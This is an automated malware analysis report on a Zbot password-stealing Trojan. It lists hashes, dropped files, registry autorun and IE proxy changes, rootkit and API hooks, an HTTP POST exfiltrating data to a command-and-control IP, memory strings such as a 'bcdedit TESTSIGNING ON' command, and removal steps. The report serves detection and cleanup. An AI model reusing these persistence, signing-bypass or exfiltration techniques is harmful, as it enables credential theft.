Skip to main content

TrojanPSW.Win32.Zbot.4_ef5b3f9077


HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.GenericKD.1604712 (B) (Emsisoft), Trojan.GenericKD.1604712 (AdAware), Trojan-PSW.Win32.Zbot.4.FD, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan-PSW, Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: ef5b3f90776d64055a927ff0980abedd

SHA1: d297e1dda2be39da75d6e2972dd51a6e9278aac7

SHA256: f8c826eda75e5d406fc6f06a13836d2b127dae4a2e91d8b4e862c8fd34a7e7b3

SSDeep: 192:0aWjyh/fBFJtS/liOhMwb5QRLjMR /vJ8vXkghW3USoQkC4duC8ffbQSEyw:YyheNitu2RLjpH9ghe91kCh0SE1

Size: 20636 bytes

File type: EXE

Platform: WIN32

Entropy: Not Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2012-01-27 22:38:07

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan-PSW. Trojan program intended for stealing users passwords.

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan-PSW creates the following process(es):

tasklist.exe:1716
reg.exe:272
attrib.exe:2092
driverquery.exe:3648
systeminfo.exe:3828
makecab.exe:3932
fmpal.exe:2112
uhahbe.exe:2180
pdf_updater.exe:2844
dmpal.exe:3388

The Trojan-PSW injects its code into the following process(es):

uhahbe.exe:1760
Explorer.EXE:1948

File activity

The process tasklist.exe:1716 makes changes in the file system.


The Trojan-PSW creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_1.tmp (119500 bytes)

The process reg.exe:272 makes changes in the file system.


The Trojan-PSW creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_1.tmp (3240059 bytes)

The process driverquery.exe:3648 makes changes in the file system.


The Trojan-PSW creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_1.tmp (416527 bytes)

The process systeminfo.exe:3828 makes changes in the file system.


The Trojan-PSW creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_1.tmp (352446 bytes)

The process makecab.exe:3932 makes changes in the file system.


The Trojan-PSW creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~2.tmp (124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab3 (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab2 (4669 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab5 (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab4 (4669 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab6 (8 bytes)

The Trojan-PSW deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\cab11 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab3 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab2 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab4 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab7 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab6 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab8 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab10 (0 bytes)

The process fmpal.exe:2112 makes changes in the file system.


The Trojan-PSW creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\PVU5D3E.bat (173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Iwibs\uhahbe.exe (3573 bytes)

The process uhahbe.exe:1760 makes changes in the file system.


The Trojan-PSW creates and/or writes to the following file(s):

%System%\drivers\d46dd.sys (745 bytes)
%Documents and Settings%\%current user%\ntuser.dat.LOG (9960 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (8076 bytes)

The process pdf_updater.exe:2844 makes changes in the file system.


The Trojan-PSW creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\1203a[1].ton (1684 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fmpal.exe (1781 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\13003UKp[1].ton (1760 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dmpal.exe (1733 bytes)

The process dmpal.exe:3388 makes changes in the file system.


The Trojan-PSW creates and/or writes to the following file(s):

%WinDir%\client.dll (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\855375.cmd (105 bytes)
%WinDir%\aplib64.dll (12 bytes)
%WinDir%\aplib.dll (11 bytes)
%WinDir%\zlib1.dll (59 bytes)

The Trojan-PSW deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_1.tmp (0 bytes)

Registry activity

The process tasklist.exe:1716 makes changes in the system registry.


The Trojan-PSW creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 B6 6D 06 47 95 10 9E F2 B0 EA 42 66 EE 8B 6E"

The process reg.exe:272 makes changes in the system registry.


The Trojan-PSW creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 A9 44 F9 69 B7 10 82 1C 03 D0 FB 96 BB 76 61"

The process attrib.exe:2092 makes changes in the system registry.


The Trojan-PSW creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 21 10 71 02 BB 73 93 80 2B C5 DA 75 CD D2 D1"

The process driverquery.exe:3648 makes changes in the system registry.


The Trojan-PSW creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 2F 24 76 DD 70 1A A8 56 21 1C 09 CE A1 D4 4C"

The process systeminfo.exe:3828 makes changes in the system registry.


The Trojan-PSW creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 C8 E3 93 E9 B3 4F 23 F8 96 73 12 B5 9D 4D 1F"

The process makecab.exe:3932 makes changes in the system registry.


The Trojan-PSW creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 75 D5 97 10 86 69 BA 29 39 03 0F E8 DC 6C 9C"

The process fmpal.exe:2112 makes changes in the system registry.


The Trojan-PSW creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 B4 58 F7 2E B7 18 59 90 B4 22 5B 73 D3 7B 32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process uhahbe.exe:1760 makes changes in the system registry.


The Trojan-PSW creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 02 8C F9 21 59 4C 58 77 BC 1A 7E BC BF 1B DA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Ugywyfo]
"28abe2je" = "iq70ApAFMC83GtWmy4TVKg==("

The process pdf_updater.exe:2844 makes changes in the system registry.


The Trojan-PSW creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"dmpal.exe" = "dmpal"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"fmpal.exe" = "fmpal"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 0C 7C B2 45 93 B3 DA E0 64 C4 BD B9 3D A6 6B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-PSW modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-PSW deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process dmpal.exe:3388 makes changes in the system registry.


The Trojan-PSW creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B F6 FA 70 EF DE 3F 0C 80 9C 79 CE 45 EF 6B 66"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 01 00 00 00 00 00 00 00"

The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan-PSW modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan-PSW adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"dumpprov" = "rundll32 %WinDir%\client.dll,CreateProcessNotify"

The Trojan-PSW deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
02177948855c3cdf6a8e23d13160228fc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\pdf_updater.exe
7fe2b0b3fc2078130f20070a05daf8d5c:\WINDOWS\aplib.dll
3f4fe60b6d1e05144f6efa098ac381a8c:\WINDOWS\aplib64.dll
35c7b7eebe35bc4db0d01965b1193823c:\WINDOWS\client.dll
80e41408f6d641dc1c0f5353a0cc8125c:\WINDOWS\zlib1.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "%System%\Drivers\b68915e210e9ddd0.sys" the Trojan-PSW controls loading executable images into a memory by installing the Load image notifier.


Using the driver "%System%\Drivers\b68915e210e9ddd0.sys" the Trojan-PSW controls operations with a system registry by installing the registry notifier.


The Trojan-PSW installs the following kernel-mode hooks:

ZwOpenProcess
ZwOpenThread

The Trojan-PSW installs the following user-mode hooks in WININET.dll:

HttpSendRequestExW
HttpSendRequestExA
InternetWriteFile
InternetReadFileExA
InternetReadFileExW
HttpSendRequestA
HttpSendRequestW
InternetQueryDataAvailable
HttpQueryInfoW
InternetCloseHandle
HttpQueryInfoA
InternetReadFile

The Trojan-PSW installs the following user-mode hooks in CRYPT32.dll:

PFXImportCertStore

The Trojan-PSW installs the following user-mode hooks in USER32.dll:

GetClipboardData
TranslateMessage

The Trojan-PSW installs the following user-mode hooks in Secur32.dll:

UnsealMessage
SealMessage
DeleteSecurityContext

The Trojan-PSW installs the following user-mode hooks in WS2_32.dll:

WSAGetOverlappedResult
WSASend
recv
gethostbyname
WSARecv
send
closesocket
freeaddrinfo
getaddrinfo
GetAddrInfoW

The Trojan-PSW installs the following user-mode hooks in ntdll.dll:

LdrLoadDll
NtCreateThread

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    tasklist.exe:1716
    reg.exe:272
    attrib.exe:2092
    driverquery.exe:3648
    systeminfo.exe:3828
    makecab.exe:3932
    fmpal.exe:2112
    uhahbe.exe:2180
    pdf_updater.exe:2844
    dmpal.exe:3388

  3. Delete the original Trojan-PSW file.
  4. Delete or disinfect the following files created/modified by the Trojan-PSW:

    %Documents and Settings%\%current user%\Local Settings\Temp\_1.tmp (119500 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~2.tmp (124 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\cab3 (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\cab2 (4669 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\cab5 (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\cab4 (4669 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\cab6 (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\PVU5D3E.bat (173 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Iwibs\uhahbe.exe (3573 bytes)
    %System%\drivers\d46dd.sys (745 bytes)
    %Documents and Settings%\%current user%\ntuser.dat.LOG (9960 bytes)
    %Documents and Settings%\%current user%\NTUSER.DAT (8076 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\1203a[1].ton (1684 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\fmpal.exe (1781 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\13003UKp[1].ton (1760 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\dmpal.exe (1733 bytes)
    %WinDir%\client.dll (228 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\855375.cmd (105 bytes)
    %WinDir%\aplib64.dll (12 bytes)
    %WinDir%\aplib.dll (11 bytes)
    %WinDir%\zlib1.dll (59 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "dumpprov" = "rundll32 %WinDir%\client.dll,CreateProcessNotify"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text4096297830724.12195667b2e43928b7b4f7997d3771ee35279
.data8192504851204.019033bb690ef3f51cc08743db079d31031df
.rsrc1638410872112643.092764ade1c0dc38342fa47a24dd94bab4ec8

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://95.211.192.195/tasks?version=111&group=0313a&client=273076e36ee6390d08c77a91bceb4e55&computer=XP2&os=5.1&latency=0.0
hxxp://95.211.192.195/data?version=1011&group=0313a&client=273076e36ee6390d08c77a91bceb4e55&computer=XP2&os=5.1&latency=0.0&type=8

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /tasks?version=111&group=0313a&client=273076e36ee6390d08c77a91bceb4e55&computer=XP2&os=5.1&latency=0.0 HTTP/1.1

User-Agent: Microsoft-CryptoAPI/6.1

Host: 95.211.192.195

Connection: Keep-Alive

HTTP/1.1 404 Not Found

Server: nginx

Date: Wed, 30 Apr 2014 17:46:58 GMT

Content-Type: text/html; charset=utf8

Content-Length: 162

Connection: keep-alive

<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>....

POST /data?version=1011&group=0313a&client=273076e36ee6390d08c77a91bceb4e55&computer=XP2&os=5.1&latency=0.0&type=8 HTTP/1.1

User-Agent: Microsoft-CryptoAPI/6.1

Host: 95.211.192.195

Content-Length: 11642

Connection: Keep-Alive

Cache-Control: no-cache

MSCF....z-......,...................C........ .........D.. ._1.tmp...aW=...CK.]ms..r.|<........b. ....#Kr...yD'NO...$-.."yI.......H..l....d:.d.C....<.]@ s|t..%.y..O^.|u......*!...."./.M...s.......(.4..J.K.......zBE!n.?E~H...$.9[Eq@..J|.%.{./Wy..7.|..Y.{%......}.X..tD..K./N.....cQ.".=._.W...DY..0.4'.y.....ET.a....9Y...W.z........#pN..K2..q.i0...1..a.6...Ju...G...I&....d...Lz...TQ...}M...q..G....$.3r..BN....)z. ..*._tpe.*C......&A.(.../.g/.{`...vL.0~5..#...

...^y...F.|.pp.e|.

p.3..V{.]..UO.t/J....D......w.|.r.-....PYNT...fY.,....a...p..p...fkd......d .'...%!...0E....b..._..K 1...Lf.......^.n.E..3.,MK

..y......./...x....e.6..L}/~%.&.V....E.....p....l.N.?>.$...(.O.......m.x.qz.

. .{r..E.<F=..%z..y..z.M.#...0....$..h...NK...."...4\6...........b....v..^u....O....~..........}.I.7v.$.sQ.Y.{8."$.......A.f.7...p...>>..K/J6E[rs5..q~..9>.L.iR......p[.........5<jh|......j......Q.vd..:....hb;Z..6...`;b.Q...XdT,2*......EF.".b..Xd(...E.b..Xd(...E.b..Xd(.....EF.".a....hXd4,2......E.a.aXd....E.a.aXd....E.a.aXdt,2:......EF.".c.....Xdt,2:......E.."c`.1...Xd,2.......E.."cb.1...XdL,2&......E.."cb....XXd,,2.......E.."ca....XXdl,26......E.."cc.....Xdl,26~..^j.w.T.6....P...*z'@Eo..........w....@c..........=._UfRJ.u. }:..i....L.}.f%`.T1lL.K.g..c..u.S.

HTTP/1.1 404 Not Found

Server: nginx

Date: Wed, 30 Apr 2014 17:47:54 GMT

Content-Type: text/html; charset=utf8

Content-Length: 162

Connection: keep-alive

<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>......

Map

Strings from Dumps

uhahbe.exe_1760:

.text

.text

`.data

`.data

.idata

.idata

@.reloc

@.reloc

PSSSSSSh

PSSSSSSh

bcdedit.exe -set TESTSIGNING ON

bcdedit.exe -set TESTSIGNING ON

%s\drivers\%s.sys

%s\drivers\%s.sys

\\.\NtSecureSys

\\.\NtSecureSys

ntdll.dll

ntdll.dll

svchost.exe

svchost.exe

EUDC\%d

EUDC\%d

KeDelayExecutionThread

KeDelayExecutionThread

WinExec

WinExec

KERNEL32.dll

KERNEL32.dll

ExitWindowsEx

ExitWindowsEx

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

RegCloseKey

RegCloseKey

RegFlushKey

RegFlushKey

RegCreateKeyExA

RegCreateKeyExA

ADVAPI32.dll

ADVAPI32.dll

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

msvcrt.dll

msvcrt.dll

Invalid parameter passed to C runtime function.

Invalid parameter passed to C runtime function.

0123456789

0123456789

:$:,:4:<</pre><pre>cRt.1</pre><pre>@[.cZ</pre><pre>http://www.google.com/</pre><pre>http://www.bing.com/</pre><pre>REPORT</pre><pre>bcdfghjklmnpqrstvwxzRegDeleteKeyExW</pre><pre>HTTP/1.1</pre><pre>userenv.dll</pre><pre>del "%s"</pre><pre>if exist "%s" goto d</pre><pre>del /F "%s"</pre><pre>gdiplus.dll</pre><pre>GdiplusShutdown</pre><pre>%3<8645=</pre><pre>7! *.gagZce{(#--2{}s %%;wdX</pre><pre>6019>6*//</pre><pre>0*18 2$4</pre><pre>! <47.ggt?45</pre><pre>L$$</pre><pre>w%fkN</pre><pre>m9.td</pre><pre>t.Ht$HHt</pre><pre>zcÁ</pre><pre>GetKeyboardState</pre><pre>MsgWaitForMultipleObjects</pre><pre>RegCreateKeyExW</pre><pre>RegQueryInfoKeyW</pre><pre>RegDeleteKeyW</pre><pre>RegOpenKeyExW</pre><pre>RegEnumKeyExW</pre><pre>CryptGetKeyParam</pre><pre>CryptImportKey</pre><pre>CryptDestroyKey</pre><pre>PathIsURLW</pre><pre>UrlUnescapeA</pre><pre>SHLWAPI.dll</pre><pre>ShellExecuteW</pre><pre>Secur32.dll</pre><pre>ole32.dll</pre><pre>WS2_32.dll</pre><pre>CertDeleteCertificateFromStore</pre><pre>CertOpenSystemStoreW</pre><pre>CertCloseStore</pre><pre>CertEnumCertificatesInStore</pre><pre>CertDuplicateCertificateContext</pre><pre>PFXExportCertStoreEx</pre><pre>PFXImportCertStore</pre><pre>CRYPT32.dll</pre><pre>HttpSendRequestExA</pre><pre>HttpQueryInfoA</pre><pre>InternetCrackUrlA</pre><pre>HttpOpenRequestA</pre><pre>HttpEndRequestA</pre><pre>HttpAddRequestHeadersA</pre><pre>WININET.dll</pre><pre>OLEAUT32.dll</pre><pre>NETAPI32.dll</pre><pre>IPHLPAPI.DLL</pre><pre>VERSION.dll</pre><pre>6f6F6S6b6l6</pre><pre>2#3(3]3{3</pre><pre>0 0,000<0@0\0`0</pre><pre>urlmon.dll</pre><pre>kernel32.dll</pre><pre>\StringFileInfo\xx\%s</pre><pre>Wadvapi32.dll</pre><pre>cabinet.dll</pre><pre>rapport</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s</pre><pre>launchpadshell.exe</pre><pre>dirclt32.exe</pre><pre>wtng.exe</pre><pre>prologue.exe</pre><pre>pcsws.exe</pre><pre>fdmaster.exe</pre><pre>D"%s"</pre><pre>"%s" %s</pre><pre>/c "%s"</pre><pre>E.tmp</pre><pre>shell32.dll</pre><pre>%Documents and Settings%\%current user%\Local Settings\Temp</pre><pre>%Documents and Settings%\%current user%\Local Settings\Application Data</pre><pre>Global\{01E22063-0823-4088-6532-C4CE7D78E7DC}</pre><b>uhahbe.exe_1760_rwx_00401000_0006D000:</b><pre>PSSSSSSh</pre><pre>bcdedit.exe -set TESTSIGNING ON</pre><pre>%s\drivers\%s.sys</pre><pre>\\.\NtSecureSys</pre><pre>ntdll.dll</pre><pre>svchost.exe</pre><pre>EUDC\%d</pre><pre>KeDelayExecutionThread</pre><pre>WinExec</pre><pre>KERNEL32.dll</pre><pre>ExitWindowsEx</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>RegCloseKey</pre><pre>RegFlushKey</pre><pre>RegCreateKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>msvcrt.dll</pre><pre>Invalid parameter passed to C runtime function.</pre><pre>0123456789</pre><pre>:$:,:4:<</pre><pre>cRt.1</pre><pre>@[.cZ</pre><pre>http://www.google.com/</pre><pre>http://www.bing.com/</pre><pre>REPORT</pre><pre>bcdfghjklmnpqrstvwxzRegDeleteKeyExW</pre><pre>HTTP/1.1</pre><pre>userenv.dll</pre><pre>del "%s"</pre><pre>if exist "%s" goto d</pre><pre>del /F "%s"</pre><pre>gdiplus.dll</pre><pre>GdiplusShutdown</pre><pre>%3<8645=</pre><pre>7! *.gagZce{(#--2{}s %%;wdX</pre><pre>6019>6*//</pre><pre>0*18 2$4</pre><pre>! <47.ggt?45</pre><pre>L$$</pre><pre>w%fkN</pre><pre>m9.td</pre><pre>t.Ht$HHt</pre><pre>zcÁ</pre><pre>GetKeyboardState</pre><pre>MsgWaitForMultipleObjects</pre><pre>RegCreateKeyExW</pre><pre>RegQueryInfoKeyW</pre><pre>RegDeleteKeyW</pre><pre>RegOpenKeyExW</pre><pre>RegEnumKeyExW</pre><pre>CryptGetKeyParam</pre><pre>CryptImportKey</pre><pre>CryptDestroyKey</pre><pre>PathIsURLW</pre><pre>UrlUnescapeA</pre><pre>SHLWAPI.dll</pre><pre>ShellExecuteW</pre><pre>Secur32.dll</pre><pre>ole32.dll</pre><pre>WS2_32.dll</pre><pre>CertDeleteCertificateFromStore</pre><pre>CertOpenSystemStoreW</pre><pre>CertCloseStore</pre><pre>CertEnumCertificatesInStore</pre><pre>CertDuplicateCertificateContext</pre><pre>PFXExportCertStoreEx</pre><pre>PFXImportCertStore</pre><pre>CRYPT32.dll</pre><pre>HttpSendRequestExA</pre><pre>HttpQueryInfoA</pre><pre>InternetCrackUrlA</pre><pre>HttpOpenRequestA</pre><pre>HttpEndRequestA</pre><pre>HttpAddRequestHeadersA</pre><pre>WININET.dll</pre><pre>OLEAUT32.dll</pre><pre>NETAPI32.dll</pre><pre>IPHLPAPI.DLL</pre><pre>VERSION.dll</pre><pre>6f6F6S6b6l6</pre><pre>2#3(3]3{3</pre><pre>0 0,000<0@0\0`0</pre><pre>urlmon.dll</pre><pre>kernel32.dll</pre><pre>\StringFileInfo\xx\%s</pre><pre>Wadvapi32.dll</pre><pre>cabinet.dll</pre><pre>rapport</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s</pre><pre>launchpadshell.exe</pre><pre>dirclt32.exe</pre><pre>wtng.exe</pre><pre>prologue.exe</pre><pre>pcsws.exe</pre><pre>fdmaster.exe</pre><pre>D"%s"</pre><pre>"%s" %s</pre><pre>/c "%s"</pre><pre>E.tmp</pre><pre>shell32.dll</pre><pre>%Documents and Settings%\%current user%\Local Settings\Temp</pre><pre>%Documents and Settings%\%current user%\Local Settings\Application Data</pre><pre>Global\{01E22063-0823-4088-6532-C4CE7D78E7DC}</pre><b>uhahbe.exe_1760_rwx_00BD0000_00006000:</b><pre>PSSSSSSh</pre><pre>bcdedit.exe -set TESTSIGNING 